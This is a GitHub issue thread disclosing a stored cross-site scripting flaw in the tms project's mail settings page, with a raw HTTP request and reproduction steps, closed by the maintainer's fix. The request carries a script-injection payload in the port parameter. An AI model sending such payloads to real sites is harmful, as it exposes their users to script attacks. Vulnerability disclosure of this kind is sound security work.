### ISSUE TITLE
There is a cross site scripting vulnerability exists in tms

### ISSUE THREAD

**Issue by afeng2016-s** [xiweicheng/tms#15]
[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in tms. The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product] 
https://github.com/xiweicheng/tms

[Affected Product Code Base] 
v2.28.0

[Affected Component] 
POST /tms/admin/setting/mail/createOrUpdate HTTP/1.1
Host: localhost:8080
Content-Length: 113
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/tms/admin/setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=CDC518A82EFF7D857356EBF9AB4206D2; locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663; Hm_lpvt_a4980171086658b20eb2d9b523ae1b7b=1645601594
Connection: close

host=smtp.163.com&port=25%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&username=someone%40163.com&password=&addr=&=

[Attack Type] 
Remote

[Impact Code execution] 
true

[Vulnerability proof] 
1.Access URL: http://localhost:8080/tms/admin/setting , enter the system setting interface
![image](https://user-images.githubusercontent.com/85676107/155281262-0816a893-788d-47ab-9f94-9ae081709811.png)

2.Enter JS code in the form: <script> alert ("XSS") </script >
![image](https://user-images.githubusercontent.com/85676107/155281298-8bd131b0-159d-40cd-ab2e-d5c8e8c8fcc8.png)

![image](https://user-images.githubusercontent.com/85676107/155281339-7f848526-78a9-4822-8ec3-e3b53f129a93.png)

3.Click Save to trigger a pop-up window, and the loophole reappearance is completed.
![image](https://user-images.githubusercontent.com/85676107/155281371-35b2ff32-4ced-40ea-8a53-dd645a66d20c.png)

4.The cause of the vulnerability is that the input data is not filtered in the foreground page /TMS/admin/setting/mail/ createorupdate, and the input parameters are directly passed into the setting method of AdminController and executed.
![image](https://user-images.githubusercontent.com/85676107/155281406-8f48ff01-165a-48a0-a911-88518b0bbac1.png)

![image](https://user-images.githubusercontent.com/85676107/155281776-fbc93145-9579-4949-87f3-a5aab75c91e9.png)

**Comment by xiweicheng** [comment]
👍 fixed.
<img width="729" alt="image" src="https://user-images.githubusercontent.com/9198971/160241542-06caa56e-d189-48b3-9d9c-280bd6ea9587.png">
